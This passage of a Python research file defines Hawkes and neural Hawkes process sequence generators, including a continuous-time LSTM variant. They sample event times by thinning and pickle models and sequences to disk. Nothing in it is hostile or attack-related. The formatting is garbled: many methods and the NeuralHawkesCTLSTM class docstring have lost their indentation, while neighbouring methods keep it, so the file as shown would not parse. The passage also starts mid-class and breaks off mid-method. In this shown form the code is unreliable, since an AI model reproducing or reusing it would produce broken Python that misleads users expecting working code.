    def save_model(self, file_save):
        '''Pickle the process parameters and metadata to file_save.'''
        print("saving model of generator ... ")
        model_dict = {
            'mu': numpy.copy(self.mu),
            'alpha': numpy.copy(self.alpha),
            'delta': numpy.copy(self.delta),
            'dim_process': self.dim_process,
            'name': self.name,
            'args': self.args
        }
        with open(file_save, 'wb') as f:
            pickle.dump(model_dict, f)
    #
    def restart_sequence(self):
        '''Clear the event memory and reset the starting time to 0.'''
        self.intensity_tilde = numpy.copy(self.mu)
        self.intensity = self.soft_relu(self.intensity_tilde)
        #
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        #
        self.one_seq = []
        #self.flag_continue = True
        self.cnt_total_event = numpy.int32(len(self.one_seq))
    #
    #
    #
    def compute_intensity_given_past(self, time_current):
        '''
        Recompute self.intensity_tilde / self.intensity at time_current
        given all events stored in self.one_seq.
        '''
        # initialize with mu
        self.intensity_tilde = numpy.copy(self.mu)
        for event in self.one_seq:
            time_since_start = event['time_since_start']
            #if time_current > time_since_start:
            # if this event is counted as * past event *
            type_event = event['type_event']
            change_time = time_current - time_since_start
            decay_frac = numpy.exp(
                -self.delta[:, type_event] * change_time
            )
            # self.intensity += self.alpha[:, idx_to_occur]
            self.intensity_tilde += numpy.copy(
                self.alpha[:, type_event] * decay_frac
            )
        self.intensity = self.soft_relu(
            self.intensity_tilde
        )
        # intensity computation is finished
    #
    #
    def compute_intensity_upper_bound(self, time_current):
        '''
        Compute an upper bound on the intensity at time_current by
        keeping only the non-negative (exciting) parts of alpha; used
        as the hazard rate in the thinning algorithm.
        '''
        self.intensity_tilde_ub = numpy.copy(
            self.mu
        )
        # to speed up, this mu is not passed through the relu,
        # but the result is still a valid upper bound
        #self.hard_relu(
        #    self.mu
        #)
        for event in self.one_seq:
            time_since_start = event['time_since_start']
            #if time_current > time_since_start:
            type_event = event['type_event']
            change_time = time_current - time_since_start
            decay_frac = numpy.exp(
                -self.delta[:, type_event] * change_time
            )
            self.intensity_tilde_ub += numpy.copy(
                self.hard_relu(
                    self.alpha[:, type_event]
                ) * decay_frac
            )
        self.intensity_ub = self.soft_relu(
            self.intensity_tilde_ub
        )
    #
    #
    def sample_time_given_type(self, type_event):
        '''
        Thinning algorithm: sample the time of the next event of one
        given type (the little k in the paper formulation), using the
        upper-bound intensity as hazard rate.
        '''
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        #
        #self.compute_intensity(time_current)
        self.compute_intensity_upper_bound(time_current)
        #
        intensity_hazard = numpy.copy(
            self.intensity_ub[type_event]
        )
        #
        u = 1.5
        while u >= 1.0:
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            time_current += ( E / intensity_hazard )
            self.compute_intensity_given_past(time_current)
            u = U * intensity_hazard / self.intensity[type_event]
            # adaptive thinning: decrease the upper bound each
            # iteration; used when sampling from pre-trained models
            self.compute_intensity_upper_bound(time_current)
            intensity_hazard = numpy.copy(
                self.intensity_ub[type_event]
            )
        #
        return time_current
    #
    #
    def sample_time_for_all_type(self):
        '''
        Thinning algorithm on the total upper-bound rate: sample the
        time of the next event regardless of its type.
        '''
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        #
        #self.compute_intensity(time_current)
        self.compute_intensity_upper_bound(time_current)
        intensity_hazard = numpy.sum(self.intensity_ub)
        #
        u = 1.5
        while u >= 1.0:
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            time_current += ( E / intensity_hazard )
            self.compute_intensity_given_past(time_current)
            u = U * intensity_hazard / numpy.sum(self.intensity)
            # for adaptive thinning,
            # decrease the upper bound
            # this is not used at the beginning of the project
            # it is only used for sampling given pre-trained models
            '''
            self.compute_intensity_upper_bound(time_current)
            intensity_hazard = numpy.sum(self.intensity_ub)
            '''
        return time_current
    #
    #
    def sample_one_event_sep(self):
        '''
        Sample one event per type separately and keep the earliest
        (Liniger-style competing risks).
        '''
        time_of_happen = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        for type_event in range(self.dim_process):
            # sample one event using "thinning algorithm"
            time_of_happen[type_event] = numpy.copy(
                self.sample_time_given_type(
                    type_event
                )
            )
        #
        time_since_start_new = numpy.min(time_of_happen)
        type_event_new = numpy.argmin(time_of_happen)
        return time_since_start_new, type_event_new
    #
    #
    def sample_one_event_tog(self):
        '''
        Sample the next event time from the total rate, then draw its
        type proportionally to the per-type intensities at that time.
        '''
        time_since_start_new = self.sample_time_for_all_type()
        self.compute_intensity_given_past(
            time_since_start_new
        )
        prob = self.intensity / numpy.sum(self.intensity)
        type_event_new = numpy.random.choice(
            range(self.dim_process), p = prob
        )
        return time_since_start_new, numpy.int32(type_event_new)
    #
    #
    def sample_one_event(self):
        '''Dispatch to the joint or per-type sampler per settings.'''
        if self.sum_for_time:
            return self.sample_one_event_tog()
        else:
            return self.sample_one_event_sep()
    #
    #
    def gen_one_seq(self, max_len):
        '''
        Generate one sequence of max_len events, restarting the state.
        '''
        self.restart_sequence()
        '''
        Liiniger (2009), p. 28, describes a "thinning algorithm":
        generate one event of each type, take the minimum,
        and discard the others.
        Details found in my paper write-up
        #
        max_len is a pre-sampled value to set the length of seq
        '''
        # initialize the seq
        time_since_start = numpy.float32(0.0)
        time_since_start_each_event = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        #
        for idx_event in range(max_len):
            time_since_start_new, type_event_new = self.sample_one_event()
            self.cnt_total_event += 1
            #
            # update sequence
            time_since_last_event = time_since_start_new - time_since_start
            time_since_start = time_since_start_new
            time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
            time_since_start_each_event[type_event_new] = time_since_start
            self.one_seq.append(
                {
                    'idx_event': self.cnt_total_event,
                    'type_event': type_event_new,
                    'time_since_start': time_since_start,
                    'time_since_last_event': time_since_last_event,
                    'time_since_last_same_event': time_since_last_same_event
                }
            )
            #
        #
    #
    #
    def gen_seqs(self, settings):
        '''
        Generate settings['num_seqs'] sequences, each with a length
        sampled uniformly from [min_len, max_len]; store them in
        self.list_seqs.
        '''
        #print(settings)
        num_seqs = settings['num_seqs']
        #
        self.list_seqs = []
        cnt_seqs = 0
        #for idx_seq in range(num_seqs):
        while cnt_seqs < num_seqs:
            #
            max_len = numpy.int32(
                round(
                    numpy.random.uniform(
                        low=settings['min_len'],
                        high=settings['max_len']
                    )
                )
            )
            #
            self.gen_one_seq(max_len)
            self.list_seqs.append(self.one_seq)
            cnt_seqs += 1
            if cnt_seqs % 10 == 9:
                print("idx seq of gen : ", (cnt_seqs, self.name))
                print("total number of seqs : ", num_seqs)
        #
    #
    def print_some(self):
        '''Pretty-print the first 10 generated sequences for inspection.'''
        print("printing some seqs ... ")
        for idx_seq in range(10):
            print("the id of this seq is : ", idx_seq)
            seq = self.list_seqs[idx_seq]
            list_events = []
            list_time = []
            list_dtime = []
            list_items = []
            for event_item in seq:
                list_events.append(event_item['type_event'])
                list_time.append(
                    round(event_item['time_since_start'], 4)
                )
                list_dtime.append(
                    round(event_item['time_since_last_event'], 4)
                )
                list_items.append(
                    (
                        event_item['type_event'],
                        round(
                            event_item['time_since_last_event'], 4
                        )
                    )
                )
            print("the events, time and diff time for : ", idx_seq)
            print(list_events)
            print(list_time)
            print(list_dtime)
            print("the list of items is : ")
            print(list_items)
    #
    #
    def save_seqs(self, file_save):
        '''Pickle the list of generated sequences to file_save.'''
        with open(file_save, 'wb') as f:
            pickle.dump(self.list_seqs, f)
class NeuralHawkesCTLSTM(object):
'''
here is the sequence generator
using Neural Hawkes process with continuous-time LSTM
'''
    def __init__(self, settings):
        '''
        Build a neural Hawkes generator backed by a continuous-time
        LSTM: either draw random (seeded) parameters or load them from
        the pickle at settings['path_pre_train'].
        '''
        print("initializing generator ... ")
        self.args = settings['args']
        self.sum_for_time = settings['sum_for_time']
        self.dim_float = numpy.int32(32)
        if settings['path_pre_train'] == None:
            print("random parameters ... ")
            self.dim_process = settings['dim_process']
            self.dim_model = settings['dim_LSTM']
            self.dim_time = self.dim_float
            #
            # seed the RNG so generated corpora are reproducible
            numpy.random.seed(
                settings['seed_random']
            )
            #
            #self.scale = numpy.float32(
            #    numpy.random.uniform(
            #        low = 1e-3, high = 2.0,
            #        size = (self.dim_process, )
            #    )
            #)
            # per-type softplus scale s_k; fixed to ones here
            self.scale = numpy.float32(
                numpy.ones( (self.dim_process, ) )
            )
            #
            # maps hidden state -> per-type raw intensity
            self.W_alpha = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (self.dim_model, self.dim_process)
                )
            )
            # event-type embeddings; the extra (+1) row is the
            # beginning-of-stream pseudo-type == dim_process
            self.Emb_event = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (
                        self.dim_process + numpy.int32(1),
                        self.dim_model
                    )
                )
            )
            # recurrent weights: [embedding; hidden] -> 7 gate blocks
            self.W_recur = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (
                        2 * self.dim_model,
                        7 * self.dim_model
                    )
                )
            )
            self.b_recur = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (7 * self.dim_model, )
                )
            )
        else:
            print("read pretrained model ... ")
            path_pre_train = os.path.abspath(
                settings['path_pre_train']
            )
            with open(path_pre_train, 'rb') as f:
                model_pre_train = pickle.load(f)
            self.dim_process = model_pre_train['dim_process']
            self.dim_model = model_pre_train['dim_model']
            self.dim_time = model_pre_train['dim_time']
            #
            self.scale = model_pre_train['scale']
            self.W_alpha = model_pre_train['W_alpha']
            self.Emb_event = model_pre_train['Emb_event']
            self.W_recur = model_pre_train['W_recur']
            self.b_recur = model_pre_train['b_recur']
        #
        #
        #self.intensity = numpy.copy(self.mu)
        self.name = 'NeuralHawkesGenCTLSTM'
        #
        self.intensity_tilde = None
        self.intensity = None
        #
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        #
        self.one_seq = []
        # initialization for LSTM states: the sequence starts with a
        # beginning-of-stream event of the special type dim_process
        self.one_seq.append(
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        )
        #self.hidden_t = numpy.zeros(
        #    (self.dim_model, ), dtype = dtype
        #)
        self.cell_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_target = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_decay = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.gate_output = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        #self.flag_continue = True
        self.cnt_total_event = numpy.int32(len(self.one_seq) )
        print("initialization done ")
#
#
def set_args(self, dict_args):
self.args = dict_args
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def soft_relu_scale(self, x):
# last dim of x is dim_process
x /= self.scale
y = numpy.log(numpy.float32(1.0)+numpy.exp(x))
y *= self.scale
return y
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'scale': numpy.copy(self.scale),
'W_alpha': numpy.copy(self.W_alpha),
'Emb_event': numpy.copy(self.Emb_event),
'W_recur': numpy.copy(self.W_recur),
'b_recur': numpy.copy(self.b_recur),
'dim_process': self.dim_process,
'dim_model': self.dim_model,
'dim_time': self.dim_time,
'dim_float': self.dim_float,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
    def restart_sequence(self):
        """Clear the event memory and reset the sequence clock to 0.

        Re-seeds ``one_seq`` with a BOS pseudo-event (type index
        ``dim_process``) and zeroes all continuous-time LSTM state.
        """
        self.intensity_tilde = None
        self.intensity = None
        #
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        #
        self.one_seq = []
        # initialization for LSTM states
        self.one_seq.append(
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        )
        #self.hidden_t = numpy.zeros(
        #    (self.dim_model, ), dtype = dtype
        #)
        self.cell_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_target = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_decay = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.gate_output = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        #self.flag_continue = True
        self.cnt_total_event = numpy.int32(len(self.one_seq) )
#
#
#
def sigmoid(self, x):
return 1 / (1+numpy.exp(-x))
#
#
    def compute_hidden_states(self):
        """One continuous-time LSTM step for the most recent event.

        Unlike rnn_unit in the training models (which updates, then
        decays over the inter-event gap), generation works the other
        way around: first DECAY the cell from the previous event over
        ``time_since_last_event``, then UPDATE with the new event.
        Must be called right after an event is appended to ``one_seq``
        so the stored state stays in sync with the sequence.
        """
        # every time it is called,
        # it computes the new hidden states of the LSTM
        # it gets the last event in the sequence
        # which is generated at t_(rec(t))
        # and compute its hidden states
        #TODO: decay
        # c(t) decays from cell_t toward cell_target at rate cell_decay
        cell_t_after_decay = self.cell_target + (
            self.cell_t - self.cell_target
        ) * numpy.exp(
            -self.cell_decay * self.one_seq[-1][
                'time_since_last_event'
            ]
        )
        hidden_t_after_decay = self.gate_output * numpy.tanh(
            cell_t_after_decay
        )
        #TODO: update
        emb_event_t = self.Emb_event[
            self.one_seq[-1]['type_event'], :
        ]
        # single affine transform producing all 7 gate pre-activations
        post_transform = numpy.dot(
            numpy.concatenate(
                (emb_event_t, hidden_t_after_decay),
                axis = 0
            ), self.W_recur
        ) + self.b_recur
        #
        gate_input = self.sigmoid(
            post_transform[:self.dim_model]
        )
        gate_forget = self.sigmoid(
            post_transform[self.dim_model:2*self.dim_model]
        )
        gate_output = self.sigmoid(
            post_transform[2*self.dim_model:3*self.dim_model]
        )
        gate_pre_c = numpy.tanh(
            post_transform[3*self.dim_model:4*self.dim_model]
        )
        # 2 -- input_bar and forget_bar gates (for the target cell)
        gate_input_target = self.sigmoid(
            post_transform[4*self.dim_model:5*self.dim_model]
        )
        gate_forget_target = self.sigmoid(
            post_transform[5*self.dim_model:6*self.dim_model]
        )
        # cell memory decay rate (softplus keeps it positive)
        cell_decay = self.soft_relu(
            post_transform[6*self.dim_model:]
        )
        #
        cell_t = gate_forget * cell_t_after_decay + gate_input * gate_pre_c
        cell_target = gate_forget_target * self.cell_target + gate_input_target * gate_pre_c
        #
        self.cell_t = numpy.copy(cell_t)
        self.cell_target = numpy.copy(cell_target)
        self.cell_decay = numpy.copy(cell_decay)
        self.gate_output = numpy.copy(gate_output)
#
#
#
#
    def compute_intensity_given_past(self, time_current):
        """Set ``self.intensity`` (per event type) at ``time_current``.

        Decays the cell state from the most recent event's time to
        ``time_current``, reads out the hidden state, and maps it to
        intensities via W_alpha and the scaled softplus.
        """
        time_recent = self.one_seq[-1]['time_since_start']
        #
        cell_t_after_decay = self.cell_target + (
            self.cell_t - self.cell_target
        ) * numpy.exp(
            -self.cell_decay * (
                time_current - time_recent
            )
        )
        hidden_t_after_decay = self.gate_output * numpy.tanh(
            cell_t_after_decay
        )
        #
        self.intensity_tilde = numpy.dot(
            hidden_t_after_decay, self.W_alpha
        )
        self.intensity = self.soft_relu_scale(
            self.intensity_tilde
        )
# intensity computation is finished
#
#
#
    def compute_intensity_upper_bound(self, time_current):
        """Set ``self.intensity_ub``, an upper bound on the intensity
        for all t >= time_current, used by the thinning sampler.

        In the neural model the intensity is not a sum of positive
        decreasing terms (unlike a decomposable Hawkes process, cf.
        B.3 in the NIPS paper), so each (hidden unit, type) term is
        classified as increasing or decreasing in t; increasing terms
        are replaced by their limit (gap -> 0), decreasing terms kept.
        #
        # In detail, with dc = c - c_target, the 4 cases by sign of
        # W_alpha (w) and dc are:
        #     w + dc - increasing   -> zeroed (limit is target cell)
        #     w + dc + decreasing   -> kept
        #     w - dc - decreasing   -> kept
        #     w - dc + increasing   -> zeroed
        """
        time_recent = self.one_seq[-1]['time_since_start']
        #
        cell_gap = self.cell_t - self.cell_target
        cell_gap_matrix = numpy.outer(
            cell_gap, numpy.ones(
                (self.dim_process, ), dtype=dtype
            )
        )
        # dim * dim_process
        index_increasing_0 = (cell_gap_matrix > 0.0) & (self.W_alpha < 0.0)
        index_increasing_1 = (cell_gap_matrix < 0.0) & (self.W_alpha > 0.0)
        #
        # zero the gap for increasing terms: their supremum over future
        # times is attained at the target cell value
        cell_gap_matrix[
            index_increasing_0
        ] = numpy.float32(0.0)
        cell_gap_matrix[
            index_increasing_1
        ] = numpy.float32(0.0)
        #
        cell_t_after_decay = numpy.outer(
            self.cell_target, numpy.ones(
                (self.dim_process, ), dtype=dtype
            )
        ) + cell_gap_matrix * numpy.exp(
            -numpy.outer(
                self.cell_decay, numpy.ones(
                    (self.dim_process, ), dtype=dtype
                )
            ) * (
                time_current - time_recent
            )
        )
        hidden_t_after_decay = numpy.outer(
            self.gate_output, numpy.ones(
                (self.dim_process, ), dtype=dtype
            )
        ) * numpy.tanh(cell_t_after_decay)
        #
        self.intensity_tilde_ub = numpy.sum(
            hidden_t_after_decay * self.W_alpha,
            axis=0
        )
        self.intensity_ub = self.soft_relu_scale(
            self.intensity_tilde_ub
        )
#
# intensity computation is finished
#
#
    def sample_time_given_type(self, type_event):
        """Sample the next occurrence time of ``type_event`` (the
        little k in the paper) by Ogata's thinning algorithm.

        Proposes exponential inter-arrival gaps at the upper-bound
        rate and accepts with probability intensity / upper bound.
        NOTE(review): assumes the upper bound is strictly positive;
        a zero bound would divide by zero here.
        """
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        #
        #self.compute_intensity(time_current)
        self.compute_intensity_upper_bound(time_current)
        intensity_hazard = numpy.copy(
            self.intensity_ub[type_event]
        )
        #
        u = 1.5
        while u >= 1.0:
            #print("type is : ", type_event)
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            #print("E U time_current : ")
            #print(E, U, time_current)
            #print("intensity hazard is : ")
            #print(intensity_hazard)
            time_current += (E / intensity_hazard)
            self.compute_intensity_given_past(time_current)
            # accept the proposal when u < 1
            u = U * intensity_hazard / self.intensity[type_event]
            #print("new time_current and u : ")
            #print(time_current, u)
            #print("intensity and upper bound is : ")
            #print(self.intensity)
            #print(self.intensity_ub)
            # use adaptive thinning algorithm
            # that is, decreasing the upper bound
            # to make the sampling quicker
            # use adaptive method by
            # toggling on the following block
            '''
            self.compute_intensity_upper_bound(
                time_current
            )
            intensity_hazard = numpy.copy(
                self.intensity_ub[type_event]
            )
            '''
        return time_current
#
#
#
    def sample_time_for_all_type(self):
        """Sample the next event time from the TOTAL intensity
        (summed over all event types) by the thinning algorithm.

        Counterpart of ``sample_time_given_type``; the event type is
        drawn afterwards (see ``sample_one_event_tog``).
        """
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        #
        #self.compute_intensity(time_current)
        self.compute_intensity_upper_bound(time_current)
        intensity_hazard = numpy.sum(self.intensity_ub)
        #
        u = 1.5
        while u >= 1.0:
            #print("type is : ", type_event)
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            #print("E U time_current : ")
            #print(E, U, time_current)
            #print("intensity hazard is : ")
            #print(intensity_hazard)
            time_current += (E / intensity_hazard)
            self.compute_intensity_given_past(time_current)
            # accept the proposal when u < 1
            u = U * intensity_hazard / numpy.sum(self.intensity)
            #print("new time_current and u : ")
            #print(time_current, u)
            #print("intensity and upper bound is : ")
            #print(self.intensity)
            #print(self.intensity_ub)
            # use adaptive thinning algorithm
            # that is, decreasing the upper bound
            # to make the sampling quicker
            # use adaptive method by
            # toggling on the following block
            '''
            self.compute_intensity_upper_bound(
                time_current
            )
            intensity_hazard = numpy.sum(self.intensity_ub)
            '''
        return time_current
#
#
#
def sample_one_event_sep(self):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
return time_since_start_new, type_event_new
#
#
def sample_one_event_tog(self):
time_since_start_new = self.sample_time_for_all_type()
self.compute_intensity_given_past(
time_since_start_new
)
prob = self.intensity / numpy.sum(self.intensity)
type_event_new = numpy.random.choice(
range(self.dim_process), p = prob
)
return time_since_start_new, numpy.int32(type_event_new)
#
#
def sample_one_event(self):
if self.sum_for_time:
return self.sample_one_event_tog()
else:
return self.sample_one_event_sep()
#
#
    def gen_one_seq(self, max_len):
        """Generate one sequence of ``max_len`` events in place
        (result left in ``self.one_seq``)."""
        self.restart_sequence()
        '''
        Liiniger (2009), p. 28, describes a "thinning algorithm":
        generate one event of each type, take the minimum,
        and discard the others.
        Details found in NIPS 17 Appendix
        max_len is a pre-sampled value to set the length of seq
        '''
        # initialize the seq
        time_since_start = numpy.float32(0.0)
        # per-type clock of each type's last occurrence
        time_since_start_each_event = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        #
        for idx_event in range(max_len):
            #
            # compute the hidden states
            # of the most recent event in sequence
            self.compute_hidden_states()
            #
            time_since_start_new, type_event_new = self.sample_one_event()
            self.cnt_total_event += 1
            #
            # update sequence bookkeeping for the accepted event
            time_since_last_event = time_since_start_new - time_since_start
            time_since_start = time_since_start_new
            time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
            time_since_start_each_event[type_event_new] = time_since_start
            self.one_seq.append(
                {
                    'idx_event': self.cnt_total_event,
                    'type_event': type_event_new,
                    'time_since_start': time_since_start,
                    'time_since_last_event': time_since_last_event,
                    'time_since_last_same_event': time_since_last_same_event
                }
            )
        #
        # throw away the BOS item
        # at the head of the sequence
        self.one_seq.pop(0)
#
#
#
def gen_seqs(self, settings):
#print(settings)
print("generating sequences ... ")
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events = []
list_time = []
list_dtime = []
list_items = []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
list_dtime.append(
round(event_item['time_since_last_event'], 4)
)
list_items.append(
(
event_item['type_event'],
round(
event_item['time_since_last_event'], 4
)
)
)
print("the events, time and diff time for : ", idx_seq)
print(list_events)
print(list_time)
print(list_dtime)
print("the list of items is : ")
print(list_items)
#
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
#
#
#
#
#
#
# deprecated generators
# TODO: modules below are deprecated
# they are models that we tried over this project
# most of them work, better than Hawkes baseline
# but still lose to our neural Hawkes with continuous-time LSTM
# most of them keep the decomposable structure of Hawkes
# and try to use neural networks to parametrize it
#
#
class NeuralHawkesGen(object):
    '''
    Sequence generator using the (decomposable) Neural Hawkes process:
    a discrete-time LSTM reads the event stream and its hidden state
    modulates Hawkes-style excitation that decays at rates ``delta``.
    '''
    def __init__(self, settings):
        """Randomly initialize all parameters.

        settings keys used: dim_process, dim_LSTM, args, seed_random.
        """
        self.dim_process = settings['dim_process']
        self.dim_model = settings['dim_LSTM']
        # elapsed times enter the LSTM via a 32-bit float encoding
        self.dim_float = numpy.int32(32)
        self.dim_time = self.dim_float
        self.args = settings['args']
        numpy.random.seed(
            settings['seed_random']
        )
        # base intensity per event type
        self.mu = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (self.dim_process,)
            )
        )
        # exponential decay rates, one per (hidden unit, event type)
        self.delta = numpy.float32(
            numpy.random.uniform(
                low=10.0, high=20.0,
                size=(self.dim_model, self.dim_process)
            )
        )
        # weights mapping hidden state to additive intensity terms
        self.W_alpha = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (self.dim_model, self.dim_process)
            )
        )
        # event-type embeddings; the extra row is the BOS pseudo-event
        self.Emb_event = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (
                    self.dim_process + numpy.int32(1),
                    self.dim_model
                )
            )
        )
        self.Emb_time = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (
                    self.dim_time, self.dim_model
                )
            )
        )
        # LSTM recurrence over [event emb; time emb; hidden] -> 4 gates
        self.W_recur = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (
                    3 * self.dim_model,
                    4 * self.dim_model
                )
            )
        )
        self.b_recur = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (4*self.dim_model, )
            )
        )
        self.name = 'NeuralHawkesGen'
        self.intensity_tilde = None
        self.intensity = None
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        # the sequence starts with a BOS pseudo-event at time 0
        self.one_seq = []
        self.one_seq.append(
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        )
        self.hidden_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cnt_total_event = numpy.int32(len(self.one_seq))
    #
    def soft_relu(self, x):
        """Softplus log(1 + exp(x)); logaddexp avoids overflow of the
        naive form for large positive x."""
        return numpy.logaddexp(numpy.float32(0.0), x)
    #
    def hard_relu(self, x):
        """ReLU: 0.5 * (x + |x|) == max(x, 0)."""
        return numpy.float32(0.5) * (x + numpy.abs(x) )
    #
    def save_model(self, file_save):
        """Pickle all parameters and meta info to ``file_save``."""
        print("saving model of generator ... ")
        model_dict = {
            'mu': numpy.copy(self.mu),
            'delta': numpy.copy(self.delta),
            'W_alpha': numpy.copy(self.W_alpha),
            'Emb_event': numpy.copy(self.Emb_event),
            'Emb_time': numpy.copy(self.Emb_time),
            'W_recur': numpy.copy(self.W_recur),
            'b_recur': numpy.copy(self.b_recur),
            'dim_process': self.dim_process,
            'dim_model': self.dim_model,
            'dim_time': self.dim_time,
            'dim_float': self.dim_float,
            'name': self.name,
            'args': self.args
        }
        with open(file_save, 'wb') as f:
            pickle.dump(model_dict, f)
    #
    def restart_sequence(self):
        """Clear the event memory, reset the clock to 0, re-seed the
        BOS pseudo-event and zero the LSTM state."""
        self.intensity_tilde = None
        self.intensity = None
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        self.one_seq = []
        self.one_seq.append(
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        )
        self.hidden_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cnt_total_event = numpy.int32(len(self.one_seq))
    #
    def float32_to_bit(self, float_input):
        '''
        Convert ``float_input`` to float32 and return its 32-bit
        IEEE-754 representation as a 0/1 vector of length dim_float.
        '''
        float32_input = numpy.float32(float_input)
        # bytearray yields ints on both Python 2 and 3; the previous
        # ``ord(c)`` loop raised TypeError on Python 3, where
        # iterating bytes already yields ints
        str_input = ''.join(
            format(byte_value, '08b')
            for byte_value in bytearray(struct.pack('!f', float32_input))
        )
        bit_input = numpy.zeros(
            (self.dim_float,), dtype=dtype
        )
        assert(self.dim_float == len(str_input))
        for idx, item_in_input in enumerate(str_input):
            bit_input[idx] = numpy.float32(item_in_input)
        return numpy.copy(bit_input)
    #
    def sigmoid(self, x):
        """Logistic function 1 / (1 + exp(-x))."""
        return 1 / (1+numpy.exp(-x))
    #
    def compute_hidden_states(self):
        """One LSTM step for the most recent event in ``one_seq``:
        embed (type, elapsed time), apply the recurrence, update
        ``hidden_t`` / ``cell_t``."""
        emb_event_t = self.Emb_event[
            self.one_seq[-1]['type_event'], :
        ]
        emb_time_t = numpy.dot(
            self.float32_to_bit(
                self.one_seq[-1]['time_since_last_event']
            ),
            self.Emb_time
        )
        # one affine transform produces all 4 gate pre-activations
        post_transform = numpy.dot(
            numpy.concatenate(
                (emb_event_t, emb_time_t, self.hidden_t),
                axis = 0
            ),
            self.W_recur
        ) + self.b_recur
        gate_input = self.sigmoid(
            post_transform[:self.dim_model]
        )
        gate_forget = self.sigmoid(
            post_transform[self.dim_model:2*self.dim_model]
        )
        gate_output = self.sigmoid(
            post_transform[2*self.dim_model:3*self.dim_model]
        )
        gate_pre_c = numpy.tanh(
            post_transform[3*self.dim_model:]
        )
        cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
        hidden_t_new = gate_output * numpy.tanh(cell_t_new)
